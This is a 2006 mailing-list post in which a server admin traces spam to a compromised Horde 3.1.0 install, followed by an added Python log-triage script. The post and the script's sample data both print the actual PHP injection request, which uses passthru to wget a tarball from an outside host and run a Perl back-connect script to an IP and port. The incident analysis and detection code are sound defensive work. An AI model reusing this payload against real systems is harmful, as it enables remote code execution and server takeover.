On 7/3/06, Natalio Gatti <[EMAIL PROTECTED]> wrote:
> Are you running something in Apache? If you have a script running there
> (PHP webpage, CGI script, etc.) it may have been compromised and someone
> is sending emails that way.
> BTW - PHPNuke is the worst. I had a client set that up, and within 24
> hours someone emailed them their own root password and let them know
> they had "owned" their system..... *NOT* nice.
>
And that's what I'm looking at right now. I have some (informal) pages
hosted, and I'm analyzing what the users have uploaded.

Thanks Jake, I hope to be getting to the bottom of this.


Found it!
It was my outdated Horde!!! Some Italian spammer compromised the
server via Horde 3.1.0 and installed tools to send spam.

Here are my apache logs:
----------------------------------------------------------------------------
205.138.198.226 - - [03/Jul/2006:03:44:59 -0400] "GET
//horde//services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp%20;%20wget%20free-ftp.org%22.chr(47).%22chowz%22.chr(47).%22dcpl.tar.gz%20;%20tar%20xvf%20dcpl.tar.gz%20;%20rm%20-rf%20dcpl.tar.gz%20;%20perl%20dc.pl%20128.138.126.6%204886%22);'.
HTTP/1.1" 200 8152
------------------------------------------------

It executes:
wget free-ftp.org/chowz/dcpl.tar.gz
tar zxvf dcpl.tar.gz
rm dcpl.tar.gz
perl dc.pl 128.138.126.6

And then it continues to download and execute tools. Damn!

---------------------------------------------------------------------
    QmailToaster hosted by: VR Hosted <http://www.vr.org>
---------------------------------------------------------------------
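As an added illustration (not part of the original post), here is a small Python triage script for exactly the kind of access-log entry shown above: it percent-decodes the query string, flags PHP execution primitives that should never appear in a request parameter, folds the `".chr(N)."` obfuscation back into literal characters, and lists the shell commands handed to the exec call so a defender can see what the web server was asked to run. The sample log lines are constructed: the first is the post's wrapped log entry re-joined onto one line, the second is a benign Horde request added for contrast.

```python
import re
from urllib.parse import unquote

# Constructed sample input: the post's access-log entry (re-joined onto one line) plus a benign request.
SAMPLE_LOG = [
    r'''205.138.198.226 - - [03/Jul/2006:03:44:59 -0400] "GET //horde//services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp%20;%20wget%20free-ftp.org%22.chr(47).%22chowz%22.chr(47).%22dcpl.tar.gz%20;%20tar%20xvf%20dcpl.tar.gz%20;%20rm%20-rf%20dcpl.tar.gz%20;%20perl%20dc.pl%20128.138.126.6%204886%22);'. HTTP/1.1" 200 8152''',
    r'''10.0.0.5 - - [03/Jul/2006:03:45:10 -0400] "GET /horde/services/help/?show=about&module=imp HTTP/1.1" 200 4096''',
]

# Apache combined/common log prefix: client, ident, user, timestamp, request, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# PHP execution primitives that have no business inside a query-string value.
PHP_EXEC_RE = re.compile(r'\b(passthru|system|exec|shell_exec|popen|proc_open|eval)\s*\(', re.I)
# String-concatenation obfuscation used in the post: "cd ".chr(47)."tmp" -> "cd /tmp"
CHR_CONCAT_RE = re.compile(r'"\s*\.\s*chr\((\d+)\)\s*\.\s*"')


def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def decode_query(uri):
    """Percent-decode the query string; the injected PHP hides under %22, %20 and friends."""
    return unquote(uri.partition('?')[2])


def fold_chr(text):
    """Replace ".chr(N)." concatenations with the literal character so the real command is visible."""
    return CHR_CONCAT_RE.sub(lambda m: chr(int(m.group(1))), text)


def extract_commands(query):
    """Return the ';'-separated shell commands passed to a PHP exec primitive, or [] if none."""
    m = re.search(r'(passthru|system|exec|shell_exec)\s*\(\s*"(.*?)"\s*\)', fold_chr(query), re.I | re.S)
    return [c.strip() for c in m.group(2).split(';') if c.strip()] if m else []


def analyse(line):
    """Classify one log line; None if it does not parse as an Apache access-log entry."""
    rec = parse_line(line)
    if rec is None:
        return None
    query = decode_query(rec['uri'])
    funcs = sorted({f.lower() for f in PHP_EXEC_RE.findall(query)})
    return {'ip': rec['ip'], 'status': rec['status'], 'suspicious': bool(funcs),
            'functions': funcs, 'commands': extract_commands(query)}


def scan(lines):
    """Return the analysed records for every suspicious line in the log."""
    return [r for r in map(analyse, lines) if r and r['suspicious']]


if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit['ip'], hit['status'], hit['functions'], *hit['commands'], sep='\n  ')
```

Note that a 200 status on such a request (as in the post) means the injected code ran; a hit with a 4xx still tells you who is probing.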